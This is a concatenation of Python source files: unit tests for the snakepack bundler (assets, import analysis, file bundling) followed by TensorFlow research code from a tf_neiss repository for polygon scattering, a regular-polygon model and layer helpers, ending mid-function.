module2_importalias2 = MagicMock(spec=ImportAlias)
module2_importalias2_attr = MagicMock(spec=Attribute)
module2_importalias2_attr_name = MagicMock(spec=Name)
module2_importalias2_attr_name.value = 'bar'
module2_importalias2_attr.attr = module2_importalias2_attr_name
module2_importalias2.name = module2_importalias2_attr
module2_importstmt.names = [
module2_importalias1,
module2_importalias2
]
module2_imports = [
module2_importstmt
]
testmodule_imports = MagicMock()
import_metadata = {
module1: {
ImportGraphAnalyzer.ImportProvider: {
module1_cst: module1_imports
}
},
module2: {
ImportGraphAnalyzer.ImportProvider: {
module2_cst: module2_imports
}
},
test_imported_module: testmodule_imports
}
analysis = ImportGraphAnalyzer.Analysis(
module_graph=module_graph,
node_map=node_map,
import_metadata=import_metadata
)
imported_modules = analysis.get_importing_modules(test_imported_module, test_identifier)
assert len(imported_modules) == 1
assert module1 in imported_modules
assert module2 not in imported_modules
def test_importfrom_stmts(self):
pass
```
#### File: unit/assets/test_generic.py
```python
from pathlib import Path
from snakepack.assets import AssetType, AssetContent
from snakepack.assets.generic import GenericAsset, StaticFile
class GenericAssetTest:
def test_generic_asset_type(self):
assert issubclass(GenericAsset, AssetType)
class StaticFileTest:
def test_init(self, mocker):
content = mocker.MagicMock(spec=AssetContent)
module = StaticFile(name='some_file', target_path=Path('some_file.txt'), content=content, source=None)
assert module.content is content
```
#### File: unit/assets/test_python.py
```python
import pytest
from libcst import Module
from snakepack.assets import AssetType, AssetContent
from snakepack.assets.python import Python, PythonModule, PythonModuleCst, PythonPackage, PythonApplication
from snakepack.config.types import FullyQualifiedPythonName
class PythonTest:
def test_python_asset_type(self):
assert issubclass(Python, AssetType)
class PythonModuleTest:
def test_init(self, mocker):
content = mocker.MagicMock(spec=AssetContent)
module = PythonModule(name='some.test.module', content=content, source=None)
assert module.name == 'some.test.module'
assert module.content is content
def test_matches_returns_true_when_selector_is_full_module_name(self, mocker):
content = mocker.MagicMock(spec=AssetContent)
module = PythonModule(name='some.test.module', content=content, source=None)
selector = mocker.MagicMock(spec=FullyQualifiedPythonName)
selector.has_module_path = True
selector.module_path = ['some', 'test', 'module']
assert module.matches(selector)
def test_matches_returns_true_when_selector_is_identifier(self, mocker):
content = mocker.MagicMock(spec=AssetContent)
module = PythonModule(name='some.test.module', content=content, source=None)
selector = mocker.MagicMock(spec=FullyQualifiedPythonName)
selector.has_module_path = False
selector.has_ident_path = False
assert module.matches(selector)
def test_matches_returns_true_when_selector_is_package_of_module(self, mocker):
content = mocker.MagicMock(spec=AssetContent)
module = PythonModule(name='some.test.module', content=content, source=None)
selector = mocker.MagicMock(spec=FullyQualifiedPythonName)
selector.has_module_path = True
selector.has_ident_path = False
selector.module_path = ['some', 'test']
assert module.matches(selector)
def test_matches_returns_false_when_selector_is_other_module(self, mocker):
content = mocker.MagicMock(spec=AssetContent)
module = PythonModule(name='some.test.module', content=content, source=None)
selector = mocker.MagicMock(spec=FullyQualifiedPythonName)
selector.has_module_path = True
selector.has_ident_path = False
selector.module_path = ['some', 'test', 'othermodule']
assert not module.matches(selector)
def test_matches_returns_false_when_selector_is_identifier(self, mocker):
content = mocker.MagicMock(spec=AssetContent)
module = PythonModule(name='some.test.module:some_ident', content=content, source=None)
selector = mocker.MagicMock(spec=FullyQualifiedPythonName)
selector.has_module_path = True
selector.has_ident_path = False
selector.module_path = ['some', 'test', 'othermodule']
assert not module.matches(selector)
class PythonModuleCstTest:
@pytest.mark.skip
def test_init(self, mocker):
cst = mocker.MagicMock(spec=Module)
cst.code = 'x=5'
content = PythonModuleCst(cst=cst)
assert content.cst is cst
assert str(content) == 'x=5'
@pytest.mark.skip
def test_from_string(self, mocker):
parse_module_mock = mocker.patch('libcst.parse_module')
cst = parse_module_mock.return_value
content = PythonModuleCst.from_string('x=5')
assert content.cst is cst
class PythonPackageTest:
def test_init(self, mocker):
subpackages = []
init_module = mocker.MagicMock(spec=PythonModule)
init_module.name = 'mypackage.__init__'
module1 = mocker.MagicMock(spec=PythonModule)
module2 = mocker.MagicMock(spec=PythonModule)
modules = [init_module, module1, module2]
package = PythonPackage(full_name='mypackage', modules=modules, subpackages=subpackages, data_files=[])
assert package.full_name == 'mypackage'
assert package.name == 'mypackage'
assert package.subgroups == subpackages
assert package.assets == modules
assert package.init_module is init_module
assert package.deep_assets == modules
def test_init_with_subpackages(self, mocker):
sub_init_module = mocker.MagicMock(spec=PythonModule)
sub_init_module.name = 'mypackage.subpackage.__init__'
sub_module1 = mocker.MagicMock(spec=PythonModule)
sub_module2 = mocker.MagicMock(spec=PythonModule)
sub_modules = [sub_init_module, sub_module1, sub_module2]
subpackages = [
PythonPackage(full_name='mypackage.subpackage', modules=sub_modules, subpackages=[], data_files=[])
]
init_module = mocker.MagicMock(spec=PythonModule)
init_module.name = 'mypackage.__init__'
module1 = mocker.MagicMock(spec=PythonModule)
module2 = mocker.MagicMock(spec=PythonModule)
modules = [init_module, module1, module2]
package = PythonPackage(full_name='mypackage', modules=modules, subpackages=subpackages, data_files=[])
assert package.full_name == 'mypackage'
assert package.name == 'mypackage'
assert package.subgroups == subpackages
assert package.assets == modules
assert package.init_module is init_module
assert package.deep_assets == [
*modules,
*sub_modules
]
class PythonApplicationTest:
def test_init(self, mocker):
entry_module = mocker.MagicMock(spec=PythonModule)
module1 = mocker.MagicMock(spec=PythonModule)
module2 = mocker.MagicMock(spec=PythonModule)
modules = [entry_module, module1, module2]
application = PythonApplication(entry_point=entry_module, modules=modules, packages={})
assert application.entry_point is entry_module
assert application.assets == modules
assert application.deep_assets == modules
assert application.subgroups == {}
```
#### File: unit/bundlers/test_base.py
```python
from snakepack.assets import Asset
from snakepack.bundlers import Bundle
from snakepack.bundlers._base import Bundler
from snakepack.config.model import GlobalOptions
from snakepack.loaders import Loader
from snakepack.transformers import Transformer
class BundleTest:
def test_init(self, mocker):
bundler = mocker.MagicMock(spec=Bundler)
loader = mocker.MagicMock(spec=Loader)
transformers = [
mocker.MagicMock(spec=Transformer),
mocker.MagicMock(spec=Transformer)
]
bundle = Bundle(name='bundle1', bundler=bundler, loader=loader, transformers=transformers)
assert bundle.name == 'bundle1'
assert bundle.bundler is bundler
assert bundle.loader == loader
assert bundle.transformers == transformers
def test_bundle(self, mocker):
bundler = mocker.MagicMock(spec=Bundler)
loader = mocker.MagicMock(spec=Bundler)
assets = []
transformers = []
bundle = Bundle(name='bundle1', bundler=bundler, loader=loader, transformers=transformers)
bundle.bundle()
bundler.bundle.assert_called_once_with(bundle)
class BundlerTest:
class TestBundler(Bundler):
def bundle(self, bundle: Bundle):
pass
def test_init(self, mocker):
global_options = mocker.MagicMock(spec=GlobalOptions)
bundle = mocker.MagicMock(spec=Bundle)
bundler = self.TestBundler(global_options=global_options)
bundler.bundle(bundle)
```
#### File: unit/bundlers/test_generic.py
```python
import os
from pathlib import Path
from snakepack.assets import Asset, AssetContent, AssetGroup
from snakepack.bundlers import Bundle
from snakepack.bundlers.generic import FileBundler
from snakepack.config.model import GlobalOptions
from snakepack.packagers import Package
class FileBundlerTest:
def test_config_name(self):
assert FileBundler.__config_name__ == 'file'
def test_init(self, mocker):
global_options = mocker.MagicMock(spec=GlobalOptions)
options = FileBundler.Options(output_path='test')
bundler = FileBundler(global_options=global_options, options=options)
def test_init_default_options(self, mocker):
global_options = mocker.MagicMock(spec=GlobalOptions)
bundler = FileBundler(global_options=global_options)
assert bundler.options.output_path == '{asset_target_path}'
def test_bundle(self, mocker, fs):
fs.create_dir('dist/')
package = mocker.MagicMock(spec=Package)
package.target_path = Path('dist/package1')
global_options = mocker.MagicMock(spec=GlobalOptions)
options = FileBundler.Options(output_path='{asset_target_path}')
bundler = FileBundler(global_options=global_options, options=options)
asset1 = mocker.MagicMock(spec=Asset)
content1 = mocker.MagicMock(spec=AssetContent)
content1.__str__.return_value = 'test=True'
asset1.content = content1
asset1.name = 'asset1'
asset1.target_path = Path('asset1.py')
asset2 = mocker.MagicMock(spec=Asset)
content2 = mocker.MagicMock(spec=AssetContent)
content2.__str__.return_value = 'test=False'
asset2.content = content2
asset2.name = 'somepackage.asset2'
asset2.target_path = Path('somepackage/asset2.py')
assets = [asset1, asset2]
asset_group = mocker.MagicMock(spec=AssetGroup)
asset_group.deep_assets = assets
bundle = mocker.MagicMock(spec=Bundle)
bundle.asset_group = asset_group
bundler.bundle(bundle, package=package)
assert os.path.exists('dist/package1/asset1.py')
with open('dist/package1/asset1.py') as f:
assert f.read() == 'test=True'
assert os.path.exists('dist/package1/somepackage/asset2.py')
with open('dist/package1/somepackage/asset2.py') as f:
assert f.read() == 'test=False'
``` |
{
"source": "JochenZoellner/tf_neiss-1",
"score": 3
} |
#### File: data_gen_2dt/data_gen_t2d_util/tf_polygon_2d_helper.py
```python
import logging
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
from shapely import geometry
import input_fn.input_fn_2d.data_gen_2dt.data_gen_t2d_util.polygone_2d_helper as old_helper
logger = logging.getLogger("polygone_2d_helper")
# logger.setLevel("DEBUG")
# logger.setLevel("INFO")
if __name__ == "__main__":
logging.basicConfig()
np.set_printoptions(precision=6, suppress=True)
class Fcalculator:
def __init__(self, points, epsilon=np.array(0.0001)):
"""points is list of tupel with x,y like [(x1,y1), (x2,y2), (x3,y3),...]"""
self.epsilon = epsilon
self.points = points
def q_of_phi(self, phi):
a_ = tf.math.cos(phi)
b_ = tf.math.sin(phi) - 1.0
q = tf.Variable([a_, b_])
logger.debug("q^2: {}".format(tf.math.abs(q[0] ** 2 + q[1] ** 2)))
return q
def F_of_qs(self, q, p0_, p1_, c=0.0):
p0 = np.array(p0_)
p1 = np.array(p1_)
c = np.array(c)
q_cross = np.array([-q[1], q[0]])
p0p1 = p1 - p0
scale = 1.0 / np.abs(np.abs(q[0] ** 2 + q[1] ** 2))
if scale >= 1000.0 / self.epsilon:
logger.debug("Scale == NONE")
polygon = geometry.Polygon(self.points)
area = np.array(polygon.area, dtype=np.complex)
logger.debug("area: {}".format(area))
s_value = area / len(self.points)
elif np.abs(np.dot(p0p1, q)) >= 0.0001:
f_p0 = -1.0 * np.exp(1.0j * (np.dot(p0, q) + c))
f_p1 = -1.0 * np.exp(1.0j * (np.dot(p1, q) + c))
s_value = scale * np.dot(p0p1, q_cross) * (f_p1 - f_p0) / np.dot(p0p1, q)
else:
logger.debug("np.dot(p0p1, q) > epsilon")
s_value = scale * np.dot(p0p1, q_cross) * -1.0j * np.exp(1.0j * (np.dot(p0, q) + c))
logger.debug("s_value: {:1.6f}".format(s_value))
return s_value
def F_of_qs_arr(self, q, p0_, p1_, c=0.0):
p0 = np.array(p0_)
p1 = np.array(p1_)
c = np.array(c)
q_cross = np.array([-q[1], q[0]])
p0p1 = p1 - p0
# scale = 1.0 / np.abs(np.dot(q, q))
scale = 1.0 / np.abs(q[0] ** 2 + q[1] ** 2)
f_p0 = -tf.complex(1.0, 0.0) * tf.math.exp(tf.complex(0.0, 1.0) * tf.complex(tf.tensordot(p0, q, axes=0), 0.0))
f_p1 = -tf.complex(1.0, 0.0) * tf.math.exp(tf.complex(0.0, 1.0) * tf.complex(tf.tensordot(p1, q, axes=0), 0.0))
case1_array = scale * np.dot(p0p1, q_cross) * (f_p1 - f_p0) / np.dot(p0p1, q)
case2_array = scale * np.dot(p0p1, q_cross) * -tf.complex(0.0, 1.0j) * tf.math.exp(
tf.complex(0, 1.0j) * (np.dot(p0, q) + c))
# print("case1_array.shape", case1_array.shape)
res_array = np.where(np.abs(np.dot(p0p1, q)) >= 0.0001, case1_array, case2_array)
if np.max(scale) >= 1000.0 / self.epsilon:
logger.debug("Scale == NONE")
polygon = geometry.Polygon(self.points)
area = np.array(polygon.area, dtype=np.complex)
logger.debug("area: {}".format(area))
s_value = area / len(self.points)
case3_array = np.ones_like(q[0]) * s_value
res_array = np.where(scale >= 1000.0 / self.epsilon, case3_array, res_array)
return res_array
def F_of_phi(self, phi, c=0.0):
logger.debug("###########################################")
logger.info("phi: {}".format(phi))
sum_res = np.zeros_like(phi, dtype=np.complex256)
q = self.q_of_phi(phi)
for index in range(len(self.points)):
logger.debug("index: {}".format(index))
p0 = self.points[index - 1]
p1 = self.points[index]
logger.debug("p0: {}; p1: {}".format(p0, p1))
sum_res += self.F_of_qs_arr(q, p0, p1, c=c)
logger.debug("sum_res {}".format(sum_res))
final_res = sum_res
logger.debug("sum_res.dtype: {}".format(sum_res.dtype))
logger.info("final value: {}".format(final_res))
return final_res
if __name__ == "__main__":
for target in range(4999):
convex_polygon_arr = old_helper.generate_target_polygon()
convex_polygon_tuple = old_helper.array_to_tuples(convex_polygon_arr)
polygon_calculator = Fcalculator(points=convex_polygon_tuple)
phi_array = np.arange(np.pi / 2 - 1.5, np.pi / 2 + 1.5, 0.01)
polygon_scatter_res = np.array(
[polygon_calculator.F_of_phi(phi=phi).astype(dtype=np.complex64) for phi in phi_array])
print(convex_polygon_arr.shape)
fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(9.5, 14))
ax1.plot(phi_array, polygon_scatter_res.real, "-b", label="real_polygon")
ax1.plot(phi_array, polygon_scatter_res.imag, "-y", label="imag_polygon")
ax1.plot(phi_array, np.abs(polygon_scatter_res), "-y", label="abs_polygon")
ax2.fill(convex_polygon_arr.transpose()[0], convex_polygon_arr.transpose()[1])
ax2.set_xlim((-50, 50))
ax2.set_ylim((-50, 50))
ax2.set_aspect(aspect=1.0)
plt.show()
```
#### File: model_fn/model_fn_2d/model_fn_rp2d.py
```python
import os
import shutil
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
from shapely import geometry
from itertools import permutations
import input_fn.input_fn_2d.data_gen_2dt.data_gen_t2d_util.polygone_2d_helper as p2dh
import model_fn.model_fn_2d.util_2d.graphs_rp2d as graphs
from model_fn.model_fn_base import ModelBase
class ModelRegularPolygon(ModelBase):
def __init__(self, params):
super(ModelRegularPolygon, self).__init__(params)
self._flags = self._params['flags']
self._targets = None
self._point_dist = None
self._summary_object = {"tgt_points": [], "pre_points": [], "ordered_best": [], "unordered_best": []}
def get_graph(self):
return getattr(graphs, self._params['flags'].graph)(self._params)
def get_placeholder(self):
return {"fc": tf.compat.v1.placeholder(tf.float32, [None, 3, None], name="infc")}
def get_output_nodes(self, has_graph=True):
if has_graph:
tf.identity(self._graph_out['radius_pred'], name="radius_pred") # name to grab from java
tf.identity(self._graph_out['rotation_pred'], name="rotation_pred") # name to grab from java
tf.identity(self._graph_out['translation_pred'], name="translation_pred") # name to grab from java
tf.identity(self._graph_out['edges_pred'], name="edges_pred") # name to grab from java
return "radius_pred,rotation_pred,translation_pred,edges_pred" # return names as comma separated string without spaces
#
# return {"radius_pred": radius_final,
# "rotation_pred": rotation_final,
# "translation_pred": translation_final,
# # "edges_pred": edge_final}
def get_target_keys(self):
return 'radius,rotation,translation,edges'
def get_predictions(self):
return self._graph_out
def info(self):
self.get_graph().print_params()
def get_loss(self):
# self._targets['points'] = tf.Print(self._targets['points'], [self._targets['points']])
# loss0 = tf.losses.absolute_difference(self._targets['points'], self._graph_out['p_pred'])
# print("params train batch size", self._params["flags"].train_batch_size)
# print("points", self._targets['points'])
max_edges = self._flags.max_edges
loss = 0.0
loss_edge = tf.reduce_mean(tf.sqrt(tf.compat.v1.losses.softmax_cross_entropy(
tf.one_hot(tf.squeeze(self._targets['edges'], axis=-1) - 3, depth=max_edges - 3),
self._graph_out['edges_pred'])), name="loss_edge")
loss_radius = tf.losses.mean_squared_error(self._targets['radius'], self._graph_out["radius_pred"],
scope="loss_radius")
loss_rotation = tf.losses.mean_squared_error(self._targets['rotation'], self._graph_out["rotation_pred"],
scope="loss_rotation")
loss_translation = tf.losses.mean_squared_error(
tf.sqrt(tf.reduce_sum(tf.math.square(self._targets['translation']))),
tf.sqrt(tf.reduce_sum(tf.math.square(self._graph_out["translation_pred"]))), scope="loss_translation")
loss = loss_edge + loss_radius + loss_rotation + loss_translation / 10.0
# loss = tf.Print(loss, [loss, loss_edge, loss_radius, loss_rotation, loss_translation], message="loss:all, edge, radius, rotation, translation:")
return loss
def export_helper(self):
for train_list in self._params['flags'].train_lists:
data_id = os.path.basename(train_list)[:-10]
shutil.copy(os.path.join("data/synthetic_data", data_id, "log_{}_train.txt".format(data_id)),
os.path.join(self._params['flags'].checkpoint_dir, "export"))
data_id = os.path.basename(self._params['flags'].val_list)[:-8]
shutil.copy(os.path.join("data/synthetic_data", data_id, "log_{}_val.txt".format(data_id)),
os.path.join(self._params['flags'].checkpoint_dir, "export"))
#
# def get_metrics(self):
# loss_rotation = tf.get_variable(name="graph/loss_rotation_0")
# return {'loss_rotaion': loss_rotation}
def print_evaluate(self, output_dict, target_dict):
with tf.compat.v1.Session().as_default():
tgt_area_sum = 0
area_diff_sum = 0
print("Targets")
print(target_dict)
print("Predictions:")
print(output_dict)
iou_arr = np.zeros(output_dict["edges_pred"].shape[0])
for i in range(output_dict["edges_pred"].shape[0]):
print(output_dict['edges_pred'][i])
rpf_dict_pred = {'radius': float(output_dict['radius_pred'][i]),
'rotation': float(output_dict['rotation_pred'][i]),
'translation': np.squeeze(output_dict['translation_pred'][i]),
'edges': np.argmax(output_dict['edges_pred'][i]) + 3}
rpf_dict_tgt = {'radius': float(target_dict['radius'][i]),
'rotation': float(target_dict['rotation'][i]),
'translation': np.squeeze(target_dict['translation'][i]),
'edges': int(target_dict['edges'][i])}
pred_array = p2dh.rpf_to_points_array(rpf_dict_pred)
pred_tuples = p2dh.array_to_tuples(pred_array)
tgt_array = p2dh.rpf_to_points_array(rpf_dict_tgt)
tgt_tuples = p2dh.array_to_tuples(tgt_array)
pre_polygon = geometry.Polygon(pred_tuples)
tgt_polygon = geometry.Polygon(tgt_tuples)
intersetion_area = pre_polygon.intersection(tgt_polygon).area
union_area = pre_polygon.union(tgt_polygon).area
iou_arr[i] = intersetion_area / union_area
fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(9.5, 14))
## prediction
polygon_calculator = p2dh.Fcalculator(pred_tuples)
phi_array = np.arange(np.pi / 2 - 1.5, np.pi / 2 + 1.5, 0.01)
polygon_scatter_res = polygon_calculator.F_of_phi(phi=phi_array).astype(dtype=np.complex64)
ax1.fill(pred_array.transpose()[0], pred_array.transpose()[1], label="pred", alpha=0.5)
ax2.plot(phi_array, polygon_scatter_res.real, "-b", label="real_polygon_pred")
ax2.plot(phi_array, polygon_scatter_res.imag, "-y", label="imag_polygon_pred")
ax2.plot(phi_array, np.abs(polygon_scatter_res), "-r", label="abs_polygon_pred")
## target
polygon_calculator = p2dh.Fcalculator(tgt_tuples)
phi_array = np.arange(np.pi / 2 - 1.5, np.pi / 2 + 1.5, 0.01)
polygon_scatter_res = polygon_calculator.F_of_phi(phi=phi_array).astype(dtype=np.complex64)
ax1.fill(tgt_array.transpose()[0], tgt_array.transpose()[1], label="tgt", alpha=0.5)
ax2.plot(phi_array, polygon_scatter_res.real, "-b", label="real_polygon_tgt")
ax2.plot(phi_array, polygon_scatter_res.imag, "-y", label="imag_polygon_tgt")
ax2.plot(phi_array, np.abs(polygon_scatter_res), "-r", label="abs_polygon_tgt")
ax1.set_xlim((-50, 50))
ax1.set_ylim((-50, 50))
ax1.set_aspect(aspect=1.0)
ax2.legend(loc=2)
ax1.legend(loc=2)
plt.show()
plt.clf()
plt.close()
print("iou:", iou_arr[i])
print("mean iou:", np.mean(iou_arr))
return area_diff_sum, tgt_area_sum
# def print_evaluate_summary(self):
# sample_counter = 0
# import matplotlib.pyplot as plt
#
# from matplotlib.patches import Polygon
# from shapely import geometry
# from matplotlib.collections import PatchCollection
# summary_lenght= len(self._summary_object["tgt_points"])
# print("summary length: {}".format(summary_lenght))
#
# tgt_area_arr = np.zeros(summary_lenght)
# pre_area_arr = np.zeros(summary_lenght)
# pre_area_arr = np.zeros(summary_lenght)
# iou_arr = np.zeros(summary_lenght)
# co_loss_arr = np.ones(summary_lenght) * np.nan
# wo_loss_arr = np.ones(summary_lenght) * np.nan
#
# for i in range(summary_lenght):
# pre_points = np.reshape(self._summary_object["pre_points"][i], (3,2))
# tgt_points = np.reshape(self._summary_object["tgt_points"][i], (3,2))
# # print(pre_points)
# # print(tgt_points)
# pre_polygon = geometry.Polygon([pre_points[0], pre_points[1], pre_points[2]])
# tgt_polygon = geometry.Polygon([tgt_points[0], tgt_points[1], tgt_points[2]])
# # print(pre_points, tgt_points)
# # print(i)
# intersetion_area = pre_polygon.intersection(tgt_polygon).area
# union_area = pre_polygon.union(tgt_polygon).area
# iou_arr[i] = intersetion_area / union_area
# tgt_area_arr[i] = tgt_polygon.area
# pre_area_arr[i] = pre_polygon.area
# # co_loss_arr[i] = self._summary_object["ordered_best"][i]
# # wo_loss_arr[i] = self._summary_object["unordered_best"][i]
# # if True:
# # fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(9.5, 14))
# #
# # ax1.fill(tgt_points.transpose()[0],tgt_points.transpose()[1], "b", pre_points.transpose()[0], pre_points.transpose()[1], "r", alpha=0.5)
# # ax1.set_aspect(1.0)
# # ax1.set_xlim(-20, 20)
# # ax1.set_ylim(-20, 20)
# #
# # ax2.set_title("F(phi)")
# # ## target
# # fc_arr_tgt = t2d.make_scatter_data(tgt_points, epsilon=0.002, dphi=0.001)
# # ax2.plot(fc_arr_tgt[0], fc_arr_tgt[1], label="real_tgt")
# # ax2.plot(fc_arr_tgt[0], fc_arr_tgt[2], label="imag_tgt")
# # ## prediction
# # fc_arr_pre = t2d.make_scatter_data(pre_points, epsilon=0.002, dphi=0.001)
# # ax2.plot(fc_arr_pre[0], fc_arr_pre[1], label="real_pre")
# # ax2.plot(fc_arr_pre[0], fc_arr_pre[2], label="imag_pre")
# # ax2.legend(loc=4)
# #
# #
# # ax1.set_title("(red) pre_points: p1={:2.2f},{:2.2f};p2={:2.2f},{:2.2f};p3={:2.2f},{:2.2f}\n"
# # "(blue)tgt_points: p1={:2.2f},{:2.2f};p2={:2.2f},{:2.2f};p3={:2.2f},{:2.2f}\n"
# # "iou: {:1.2f}; doa (real) {:1.2f}; doa (imag) {:1.2f}".format(
# # pre_points[0][0], pre_points[0][1], pre_points[1][0], pre_points[1][1], pre_points[2][0], pre_points[2][1],
# # tgt_points[0][0], tgt_points[0][1], tgt_points[1][0], tgt_points[1][1], tgt_points[2][0], tgt_points[2][1],
# # intersetion_area / union_area, np.sum(np.abs(fc_arr_tgt[1] - fc_arr_pre[1])) / np.sum(np.abs(fc_arr_tgt[1]) + np.abs(fc_arr_pre[1])),
# # np.sum(np.abs(fc_arr_tgt[2] - fc_arr_pre[2])) / np.sum(np.abs(fc_arr_tgt[2]) + np.abs(fc_arr_pre[2]))
# # ))
# # plt.grid()
# # pdf = os.path.join(self._params['flags'].model_dir, "single_plot_{}.pdf".format(sample_counter))
# # sample_counter += 1
# # fig.savefig(pdf)
# # plt.clf()
# # plt.close()
# # plt.show()
#
# print("mean iou: {}".format(np.mean(iou_arr)))
# print("sum tgt area: {}; sum pre area: {}; p/t-area: {}".format(np.mean(tgt_area_arr), np.mean(pre_area_arr), np.sum(pre_area_arr) / np.sum(tgt_area_arr) ))
# # print("wrong order loss: {}; correct order loss: {}; order missed: {}".format(np.nanmean(wo_loss_arr), np.nanmean(co_loss_arr), np.count_nonzero(~np.isnan(wo_loss_arr)) ))
#
# from PyPDF2 import PdfFileMerger
#
# plt.close("all")
# pdfs = [os.path.join(self._params['flags'].model_dir, "single_plot_{}.pdf".format(x)) for x in range(sample_counter)]
# merger = PdfFileMerger()
# for pdf in pdfs:
# merger.append(pdf)
# merger.write(os.path.join(self._params['flags'].model_dir, "plot_summary.pdf"))
# merger.close()
# for pdf in pdfs:
# if os.path.isfile(pdf):
# os.remove(pdf)
# else:
# logging.warning("Can not delete temporary file, result is probably incomplete!")
#
```
#### File: model_fn/util_model_fn/keras_compatible_layers.py
```python
import numpy as np
import tensorflow as tf
from tensorflow.python.util.tf_export import tf_export
# not all layers refactored for tensorflow 2. Use tf.keras.layers or update this implementation like it was done
# in ff_layer()
# <editor-fold desc="Activation Functions (leaky_relu, relu, elu, sigmoid, tanh, softmax)">
def leaky_relu(x, leak=0.1, name="leakyRelu"):
"""
Leaky ReLU activation function as proposed in the paper:
http://ai.stanford.edu/~amaas/papers/relu_hybrid_icml2013_final.pdf
It allows a small, non-zero gradient when the unit is not active.
Args:
x: input tensor.
leak: `float`, hyperparameter that controls the slope of the negative part. It corresponds
to `1/a` in the original paper and should take on small positive values between 0 and 1.
If it's 0, the Leaky ReLU becomes the standard ReLU.
name: `str`, the name scope.
Returns:
output tensor with the same shape as `x`.
"""
assert 0.0 <= leak <= 1.0
return tf.keras.layers.Maximum(0.0, x) + tf.keras.layers.Multiply(leak, tf.minimum(0.0, x))
# f1 = 0.5 * (1 + leak)
# f2 = 0.5 * (1 - leak)
# return f1 * features + f2 * abs(features)
def relu(features, name=None):
return tf.keras.activations.relu(features, name=name)
def elu(features, name=None):
return tf.nn.elu(features, name=name)
def sigmoid(x, name=None):
return tf.nn.sigmoid(x, name=name)
def tanh(x, name=None):
return tf.nn.tanh(x, name=name)
def softmax(inputs, axis=None, name=None):
return tf.nn.softmax(inputs, axis=axis, name=name)
# </editor-fold>
# <editor-fold desc="Trainable Layers (Feedforward Layer, Recurrent Layer)">
# <editor-fold desc="Feedforward Layer (ff_layer, conv1d, conv2d, sep_conv2d, dil_conv2d, deconv2d)">
def ff_layer(inputs,
outD,
is_training,
activation=relu,
use_bias=True,
use_bn=False,
initOpt=0,
biasInit=0.1,
name="dense", keras_model=None):
"""
FeedForward layer supports processing of entire feature maps (positional wise classification converning the last dimensions features).
:param inputs:
:param outD: `int`, number of output features.
:param is_training:
:param activation:
:param use_bias:
:param use_bn:
:param biasInit:
:param name:
:return:
"""
# print(keras_model._layers)
if initOpt == 0:
initOpt = 'glorot_uniform'
if type(initOpt) is not str:
raise AttributeError("Unkown kernel init opt")
if not keras_model._built and name not in keras_model._tracked_layers:
keras_model._tracked_layers[name] = tf.keras.layers.Dense(units=outD, activation=None, use_bias=use_bias,
kernel_initializer=initOpt,
bias_initializer='zeros', kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None, kernel_constraint=None,
bias_constraint=None, name=name)
# if keras_model:
# keras_model.add(dense_obj)
# print("test")
outputs = keras_model._tracked_layers[name](inputs)
if use_bn:
outputs = tf.keras.layers.BatchNormalization(outputs, training=is_training, scale=True, fused=True,
name="batchNorm")
if activation:
outputs = activation(outputs, name='activation')
return outputs
def reshape(tensor, shape, name=None):
if len(shape) == 1:
target_shape = shape
else:
target_shape = shape[1:]
reshape_layer = tf.keras.layers.Reshape(target_shape, name=name)
return reshape_layer(tensor)
def conv1d(inputs, is_training, # to be used later ?!
kernel_width,
filters,
stride=1,
activation=relu,
padding='SAME',
use_bias=True,
initOpt=0,
biasInit=0.1,
drop_rate=0.0,
name='conv1d'):
"""Adds a 1-D convolutional layer given 3-D `inputs`.
Returns:
`3-D Tensor`, has the same type `inputs`.
"""
with tf.compat.v1.variable_scope(name):
kernel_shape = [kernel_width, inputs.get_shape().as_list()[-1], filters] # [width, inFeat, outFeat]
strides = [1, 1, stride, 1]
if initOpt == 0:
stddev = np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] + kernel_shape[2]))
if initOpt == 1:
stddev = 5e-2
if initOpt == 2:
stddev = min(np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1])), 5e-2)
initializer = tf.random_normal_initializer(stddev=stddev)
if initOpt < 0:
initializer = tf.random.truncated_normal_initializer(0.0, -initOpt)
kernel_shape = [1, kernel_shape[0], kernel_shape[1], kernel_shape[2]]
inputs = tf.expand_dims(inputs, axis=1)
kernel = tf.compat.v1.get_variable("weights", kernel_shape,
initializer=initializer)
outputs = conv2d_op(inputs, kernel, strides, padding=padding, name='conv')
if use_bias:
bias = tf.compat.v1.get_variable("biases", kernel_shape[3],
initializer=tf.constant_initializer(value=biasInit))
outputs = tf.nn.bias_add(outputs, bias, name='preActivation')
if activation:
outputs = activation(outputs, name='activation')
outputs = tf.squeeze(outputs, axis=1)
if drop_rate > 0.0:
outputs = dropout(outputs, is_training=is_training, rate=drop_rate)
return outputs
def conv2d(inputs, is_training, # to be used later ?!
kernel_size,
filters,
strides=None,
activation=relu,
padding='SAME',
use_bias=True,
initOpt=0,
biasInit=0.1,
drop_rate=0.0,
name="conv2d"):
"""Adds a 2-D convolutional layer given 4-D `inputs` and `kernel`.
Args:
scope_or_name: `string` or `VariableScope`, the scope to open.
inputs: `4-D Tensor`, it is assumed that `inputs` is shaped `[batch_size, Y, X, Z]`.
is_training: `bool`, whether or not the layer is in training mode.
kernel_size: list of `ints`, length 2, [kernel_height, kernel_width].
filters: `int`, number of output filter.
strides: list of `ints`, length 4, the stride of the sliding window for each dimension of `inputs`.
activation: activation function to be used (default: `relu`).
padding: `string` from 'SAME', 'VALID'. The type of padding algorithm used in the convolution.
Returns:
`4-D Tensor`, has the same type `inputs`.
"""
with tf.compat.v1.variable_scope(name):
kernel_shape = [kernel_size[0], kernel_size[1], inputs.get_shape().as_list()[-1], filters]
if strides is None:
strides = [1, 1, 1, 1]
stddev = 5e-2
if initOpt == 0:
stddev = np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2] + kernel_shape[3]))
if initOpt == 1:
stddev = 5e-2
if initOpt == 2:
stddev = min(np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2])), 5e-2)
initializer = tf.random_normal_initializer(stddev=stddev)
if initOpt < 0:
initializer = tf.random.truncated_normal_initializer(0.0, -initOpt)
kernel = tf.compat.v1.get_variable("weights", kernel_shape,
initializer=initializer)
outputs = conv2d_op(inputs, kernel, strides, padding=padding, name='conv')
if use_bias:
